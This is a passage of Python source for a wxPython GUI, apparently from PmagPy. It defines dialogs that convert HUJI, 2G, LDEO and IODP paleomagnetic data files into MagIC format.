vbox.AddSpacer(20)\n\n self.hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.bSizer2a.ShowItems(True)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_add_dat_file_button(self,event):\n text = \"HUJI sample orientation data file (Optional)\"\n pw.on_add_file_button(self.bSizer0A, text)\n\n def on_okButton(self, event):\n \"\"\"\n grab user input values, format them, and run huji_magic.py with the appropriate flags\n \"\"\"\n os.chdir(self.WD)\n options = {}\n HUJI_file = self.bSizer0.return_value()\n if not HUJI_file:\n pw.simple_warning(\"You must select a HUJI format file\")\n return False\n options['magfile'] = HUJI_file\n dat_file = self.bSizer0A.return_value()\n if os.path.isfile(dat_file): options['datafile'] = dat_file\n else: dat_file=\"\"\n magicoutfile=os.path.split(HUJI_file)[1]+\".magic\"\n outfile=os.path.join(self.WD, magicoutfile)\n options['meas_file'] = outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_specimens.txt\"\n spec_outfile=os.path.join(self.WD, magicoutfile)\n options['spec_file'] = spec_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_samples.txt\"\n samp_outfile=os.path.join(self.WD, magicoutfile)\n options['samp_file'] = samp_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_sites.txt\"\n site_outfile=os.path.join(self.WD, magicoutfile)\n options['site_file'] = site_outfile\n magicoutfile=os.path.split(HUJI_file)[1]+\"_locations.txt\"\n loc_outfile=os.path.join(self.WD, magicoutfile)\n options['loc_file'] = loc_outfile\n user = self.bSizer1.return_value()\n options['user'] = user\n if user:\n user = '-usr ' + user\n experiment_type = self.bSizer2.return_value()\n options['codelist'] = experiment_type\n if not experiment_type:\n pw.simple_warning(\"You must select an experiment type\")\n return False\n cooling_rate = self.cooling_rate.GetValue() or 0\n if cooling_rate:\n experiment_type = experiment_type + \" \" + cooling_rate\n lab_field = self.bSizer3.return_value()\n if not lab_field:\n lab_field = \"0 0 0\"\n lab_field_list = lab_field.split()\n options['labfield'] = lab_field_list[0]\n options['phi'] = lab_field_list[1]\n options['theta'] = lab_field_list[2]\n lab_field = '-dc ' + lab_field\n spc = self.bSizer4.return_value()\n options['specnum'] = spc or 0\n if not spc:\n spc = '-spc 0'\n else:\n spc = '-spc ' + spc\n ncn = self.bSizer5.return_value()\n options['samp_con'] = ncn\n loc_name = self.bSizer6.return_value()\n options['location'] = loc_name\n if loc_name:\n loc_name = '-loc ' + loc_name\n #peak_AF = self.bSizer7.return_value()\n #options['peakfield'] = peak_AF\n\n replicate = self.bSizer8.return_value()\n if replicate:\n options['noave'] = 0\n replicate = ''\n else:\n options['noave'] = 1\n replicate = '-A'\n\n COMMAND = \"huji_magic_new.py -f {} -fd {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} -LP {} {} -ncn {} {} {} {}\".format(HUJI_file, dat_file, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, user, experiment_type, loc_name, ncn, lab_field, spc, replicate)\n program_ran, error_message = convert.huji(**options)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.huji.__doc__())\n\n\nclass convert_2g_binary_files_to_MagIC(convert_files_to_MagIC):\n\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"Folder containing one or more 2g-binary format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n #self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n self.bSizer0 = pw.choose_dir(pnl, btn_text = 'add', method = self.on_add_dir_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_specimen_ocn(pnl)\n\n #---sizer 5 ----\n TEXT=\"Location name:\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Instrument name (optional):\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl) # creates ok, cancel, help buttons and binds them to appropriate methods\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n #---button methods ---\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n WD = self.WD\n options_dict['dir_path'] = WD\n directory = self.bSizer0.return_value()\n options_dict['input_dir'] = directory\n if not directory:\n pw.simple_warning('You must select a directory containing 2g binary files')\n return False\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).endswith('.dat') or str(f).endswith('.DAT')]\n if not files:\n pw.simple_warning('No .dat files found in {}'.format(directory))\n return False\n ID = \"-ID \" + directory\n if self.bSizer1.return_value():\n particulars = self.bSizer1.return_value()\n options_dict['gmeths'] = particulars\n mcd = '-mcd ' + particulars\n else:\n mcd = ''\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer3.return_value()\n options_dict['specnum'] = spc or 0\n if not spc:\n spc = '-spc 1'\n else:\n spc = '-spc ' + spc\n ocn = self.bSizer4.return_value()\n options_dict['or_con'] = ocn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n instrument = self.bSizer6.return_value()\n options_dict['inst'] = instrument\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n replicate = '-a'\n options_dict['noave'] = 0\n else:\n replicate = ''\n options_dict['noave'] = 1\n for f in files:\n file_2g_bin = f\n outfile = file_2g_bin + \".magic\"\n options_dict['meas_file'] = outfile\n options_dict['mag_file'] = f\n spec_outfile = file_2g_bin + \"_specimens.txt\"\n samp_outfile = file_2g_bin + \"_samples.txt\"\n site_outfile = file_2g_bin + \"_sites.txt\"\n loc_outfile = file_2g_bin + \"_locations.txt\"\n options_dict['spec_file'] = spec_outfile\n options_dict['samp_file'] = samp_outfile\n options_dict['site_file'] = site_outfile\n options_dict['loc_file'] = loc_outfile\n COMMAND = \"_2g_bin_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -ncn {} {} {} -ocn {} {} {} {} {} -lat {} -lon {}\".format(WD, file_2g_bin, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, ncn, mcd, spc, ocn, loc_name, replicate, ID, instrument,lat,lon)\n if files.index(f) == (len(files) - 1): # terminate process on last file call\n # to run as module:\n if convert._2g_bin(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n else:\n print(\"Running equivalent of python command: \", COMMAND)\n if convert._2g_bin(**options_dict):\n pass # success, continue on to next file\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert._2g_bin.__doc__)\n\n # to run as command line:\n #pw.on_helpButton(\"_2g_bin_magic.py -h\")\n\n\nclass convert_2g_ascii_files_to_MagIC(convert_files_to_MagIC):\n\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"Folder containing one or more 2g-ascii format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n #self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n self.bSizer0 = pw.choose_dir(pnl, btn_text = 'add', method = self.on_add_dir_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_specimen_ocn(pnl)\n\n #---sizer 5 ----\n TEXT=\"Location name:\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Instrument name (optional):\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n self.bSizer7 = pw.replicate_measurements(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl) # creates ok, cancel, help buttons and binds them to appropriate methods\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n #---button methods ---\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n WD = self.WD\n options_dict['dir_path'] = WD\n directory = self.bSizer0.return_value()\n options_dict['input_dir'] = directory\n if not directory:\n pw.simple_warning('You must select a directory containing 2g ascii files')\n return False\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).endswith('.asc') or str(f).endswith('.ASC')]\n if not files:\n pw.simple_warning('No .dat files found in {}'.format(directory))\n return False\n ID = \"-ID \" + directory\n if self.bSizer1.return_value():\n particulars = self.bSizer1.return_value()\n options_dict['gmeths'] = particulars\n mcd = '-mcd ' + particulars\n else:\n mcd = ''\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer3.return_value()\n options_dict['specnum'] = spc or 0\n if not spc:\n spc = '-spc 1'\n else:\n spc = '-spc ' + spc\n ocn = self.bSizer4.return_value()\n options_dict['or_con'] = ocn\n loc_name = self.bSizer5.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n instrument = self.bSizer6.return_value()\n options_dict['inst'] = instrument\n if instrument:\n instrument = \"-ins \" + instrument\n replicate = self.bSizer7.return_value()\n if replicate:\n replicate = '-a'\n options_dict['noave'] = 0\n else:\n replicate = ''\n options_dict['noave'] = 1\n for f in files:\n file_2g_asc = f\n outfile = file_2g_asc + \".magic\"\n options_dict['meas_file'] = outfile\n options_dict['mag_file'] = f\n spec_outfile = file_2g_asc + \"_specimens.txt\"\n samp_outfile = file_2g_asc + \"_samples.txt\"\n site_outfile = file_2g_asc + \"_sites.txt\"\n loc_outfile = file_2g_asc + \"_locations.txt\"\n options_dict['spec_file'] = spec_outfile\n options_dict['samp_file'] = samp_outfile\n options_dict['site_file'] = site_outfile\n options_dict['loc_file'] = loc_outfile\n COMMAND = \"_2g_asc_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -ncn {} {} {} -ocn {} {} {} {} {} -lat {} -lon {}\".format(WD, file_2g_asc, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, ncn, mcd, spc, ocn, loc_name, replicate, ID, instrument,lat,lon)\n if files.index(f) == (len(files) - 1): # terminate process on last file call\n # to run as module:\n if convert._2g_asc(**options_dict):\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning()\n\n else:\n print(\"Running equivalent of python command: \", COMMAND)\n if convert._2g_asc(**options_dict):\n pass # success, continue on to next file\n else:\n pw.simple_warning()\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert._2g_bin.__doc__)\n\n # to run as command line:\n #pw.on_helpButton(\"_2g_asc_magic.py -h\")\n\nclass convert_LDEO_files_to_MagIC(convert_files_to_MagIC):\n\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"LDEO format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 2 ---\n exp_names=['AF Demag', 'Thermal (includes thellier but not trm)', 'Shaw method', 'IRM (acquisition)', 'NRM only', 'TRM acquisition', 'double AF demag', 'triple AF demag (GRM protocol)', 'Anisotropy experiment']\n self.bSizer2 = pw.experiment_type(pnl, exp_names)\n\n #---sizer 2a ---\n # add conditional boxsizer for Shaw experiments\n # if arm_labfield and trm_peakT are properly added into ldeo_magic\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n self.bSizer4 = pw.select_ncn(pnl)\n\n #---sizer 5 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer5 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ---\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n #---sizer 9 ----\n TEXT = \"peak AF field (mT) if ARM: \"\n self.bSizer9 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 10 ---\n TEXT = \"Coil number for ASC impulse coil (if treatment units in Volts): \"\n self.bSizer10 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 11 ---\n self.bSizer11 = pw.mass_or_volume_buttons(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.RIGHT, border=5)\n hbox1 = wx.BoxSizer(wx.HORIZONTAL)\n hbox1.Add(self.bSizer9, flag=wx.ALIGN_LEFT|wx.RIGHT, border=5)\n hbox1.Add(self.bSizer10, flag=wx.ALIGN_LEFT)\n\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer11, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER|wx.BOTTOM, border=20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options_dict = {}\n LDEO_file = self.bSizer0.return_value()\n if not LDEO_file:\n pw.simple_warning(\"You must provide a LDEO format file\")\n return False\n options_dict['magfile'] = LDEO_file\n magicoutfile=os.path.split(LDEO_file)[1]+\".magic\"\n outfile=os.path.join(self.WD, magicoutfile)\n options_dict['meas_file'] = outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_specimens.txt\"\n spec_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['spec_file'] = spec_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_samples.txt\"\n samp_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['samp_file'] = samp_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_sites.txt\"\n site_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['site_file'] = site_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_locations.txt\"\n loc_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['loc_file'] = loc_outfile\n experiment_type = self.bSizer2.return_value()\n options_dict['codelist'] = experiment_type\n if experiment_type:\n experiment_type = \"-LP \" + experiment_type\n lab_field = self.bSizer3.return_value()\n if lab_field:\n options_dict['labfield'], options_dict['phi'], options_dict['theta'] = lab_field.split()\n lab_field = \"-dc \" + lab_field\n ncn = self.bSizer4.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer5.return_value()\n options_dict['specnum'] = spc or 0\n if spc:\n spc = \"-spc \" + spc\n else:\n spc = \"-spc 0\"\n loc_name = self.bSizer6.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n replicate = self.bSizer8.return_value()\n if replicate:\n replicate = \"\"\n options_dict['noave'] = 0 # do average\n else:\n replicate = \"-A\"\n options_dict['noave'] = 1 # don't average\n AF_field = self.bSizer9.return_value()\n options_dict['peakfield'] = AF_field or 0\n if AF_field:\n AF_field = \"-ac \" + AF_field\n coil_number = self.bSizer10.return_value()\n options_dict['coil'] = coil_number\n if coil_number:\n coil_number = \"-V \" + coil_number\n mv = self.bSizer11.return_value()\n options_dict['mass_or_vol'] = mv\n COMMAND = \"ldeo_magic.py -f {0} -F {1} -Fsp {2} -Fsa {3} -Fsi {4} -Flo {5} {6} {7} -ncn {8} {9} {10} {11} {12} {13} -mv {14}\".format(LDEO_file, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, experiment_type, lab_field, ncn, spc, loc_name, replicate, AF_field, coil_number, mv)\n # to run as module:\n program_ran, error_message = convert.ldeo(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.ldeo.__doc__)\n\n\nclass convert_IODP_files_to_MagIC(convert_files_to_MagIC):\n\n \"\"\" \"\"\"\n\n def InitUI(self):\n\n pnl = self.panel\n\n TEXT = \"IODP format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0a ---\n TEXT = \"IODP file type\"\n self.bSizer0a = pw.radio_buttons(pnl, ['SRM discrete', 'SRM section', 'JR6', 'KLY4S'], \"Format: \", wx.HORIZONTAL)\n self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format)\n\n #self.bSizer0a = pw.labeled_yes_or_no(pnl, TEXT, label1, label2)\n #self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format, self.bSizer0a.rb1)\n #self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format, self.bSizer0a.rb2)\n\n #---sizer 0b ---\n TEXT = \"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the SRM discrete import.\"\n self.bSizer0b = pw.simple_text(pnl, TEXT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.site_lat_lon(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.replicate_measurements(pnl)\n\n #---sizer 3 ----\n #self.bSizer1a = pw.labeled_text_field(pnl, 'Specimen volume, default is 12 cc.\\nPlease provide volume in cc.')\n self.bSizer3 = pw.labeled_text_field(pnl, 'Volume in cc, default is 7cc.')\n\n #---sizer 4 ---\n self.bSizer4 = pw.labeled_text_field(pnl, 'Depth Key, default is \"Depth CSF-B (m)\"')\n\n #---sizer 5 ---\n self.bSizer5 = pw.choose_file(pnl, 'add', method = self.on_add_samples_button,\n text=\"IODP samples data file downloaded from LIMS\")\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0b, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n # grey out what isn't initially needed\n self.bSizer3.text_field.Disable()\n self.bSizer3.label.SetForegroundColour((190, 190, 190))\n self.bSizer4.text_field.Disable()\n self.bSizer4.label.SetForegroundColour((190, 190, 190))\n\n\n self.hbox_all = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n wait = wx.BusyInfo(\"Please wait, working...\\nFor large files, this may take a few minutes\")\n wx.SafeYield()\n wd = self.WD\n full_file = self.bSizer0.return_value()\n ID, IODP_file = os.path.split(full_file)\n if not ID:\n ID = '.'\n fmt = self.bSizer0a.return_value()\n if not IODP_file:\n article = \"an\" if fmt[0] == \"S\" else \"a\"\n pw.simple_warning(\"You must provide {} {} file to convert\".format(article, fmt))\n return\n outfile = IODP_file + \".magic\"\n spec_outfile = IODP_file[:IODP_file.find('.')] + \"_specimens.txt\"\n samp_outfile = IODP_file[:IODP_file.find('.')] + \"_samples.txt\"\n site_outfile = IODP_file[:IODP_file.find('.')] + \"_sites.txt\"\n loc_outfile = IODP_file[:IODP_file.find('.')] + \"_locations.txt\"\n replicate = self.bSizer2.return_value()\n if replicate: # do average\n noave = 0\n else: # don't average\n noave = 1\n try: lat,lon = self.bSizer1.return_value().split()\n except ValueError: lat,lon = '',''\n volume = self.bSizer3.return_value()\n if not volume and fmt != 'KLY4S':\n volume = 7\n comp_depth_key = self.bSizer4.return_value()\n dc_field = self.bSizer4.return_value()\n instrument = self.bSizer4.return_value()\n samp_infile = self.bSizer5.return_value()\n\n # if sample file is available, run that conversion first\n if samp_infile:\n program_ran, error_message = convert.iodp_samples_csv(samp_infile)\n if program_ran:\n print('-I- samples are read in')\n else:\n print('-W ', error_message)\n pw.simple_warning(\"Couldn't read in {}. Trying to continue with next step.\".format(samp_infile))\n\n if fmt == 'SRM section': # SRM section\n COMMAND = \"convert.iodp_srm_lore({}, {}, {}, noave={}, comp_depth_key={}, meas_file={}, lat={}, lon={})\".format(IODP_file, wd, ID, noave, comp_depth_key, outfile, lat, lon)\n program_ran, error_message = convert.iodp_srm_lore(IODP_file, wd, ID, noave=noave,\n comp_depth_key=comp_depth_key,\n meas_file=outfile,\n lat=lat, lon=lon)\n elif fmt == 'SRM discrete': # SRM discrete\n COMMAND = \"convert.iodp_dscr_lore({}, dir_path={}, input_dir_path={}, volume={}, noave={}, meas_file={}, spec_file='specimens.txt')\".format(IODP_file, wd, ID, volume, noave, outfile)\n # check for needed specimens file\n if not os.path.exists(os.path.join(wd, \"specimens.txt\")):\n pw.simple_warning(\"You need to provide an IODP samples data file\")\n return\n program_ran, error_message = convert.iodp_dscr_lore(IODP_file, dir_path=wd,\n input_dir_path=ID, volume=volume, noave=noave,\n meas_file=outfile, spec_file=\"specimens.txt\")\n\n elif fmt == \"JR6\":\n COMMAND = \"convert.iodp_jr6_lore({}, dir_path={}, input_dir_path={}, volume={}, noave={}, dc_field={}, meas_file={}, spec_file='specimens.txt')\".format(IODP_file, wd, ID, volume, noave, dc_field, outfile)\n program_ran, error_message = convert.iodp_jr6_lore(IODP_file, dir_path=wd,\n input_dir_path=ID, volume=volume, noave=noave,\n dc_field=dc_field,\n meas_file=outfile, spec_file=\"specimens.txt\")\n\n print(\"convert JR6\")\n\n elif fmt == \"KLY4S\":\n COMMAND = \"convert.iodp_kly4s_lore({}, meas_out={}, spec_infile='specimens.txt', spec_out='kly4s_specimens.txt', instrument={}, actual_volume={}, dir_path={}, input_dir_path={})\".format(IODP_file, outfile, instrument, volume, wd, ID)\n program_ran, error_message = convert.iodp_kly4s_lore(IODP_file, meas_out=outfile, spec_infile='specimens.txt',\n spec_out='kly4s_specimens.txt', instrument=instrument,\n actual_volume=volume, dir_path=wd, input_dir_path=ID)\n print(\"convert KLY4S\")\n\n print(COMMAND)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n\n del wait\n\n def on_switch_format(self, event):\n fmt = self.bSizer0a.return_value()\n if fmt == \"SRM section\":\n self.bSizer0b.static_text.SetLabel(\"Please provide Depth key and Volume below.\\nYou may optionally provide a samples data file.\")\n self.bSizer3.label.SetLabel('Volume in cc, default is 7cc.')\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('Depth Key, default is \"Depth CSF-B (m)\"')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n elif fmt == \"SRM discrete\":\n self.bSizer0b.static_text.SetLabel(\"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis 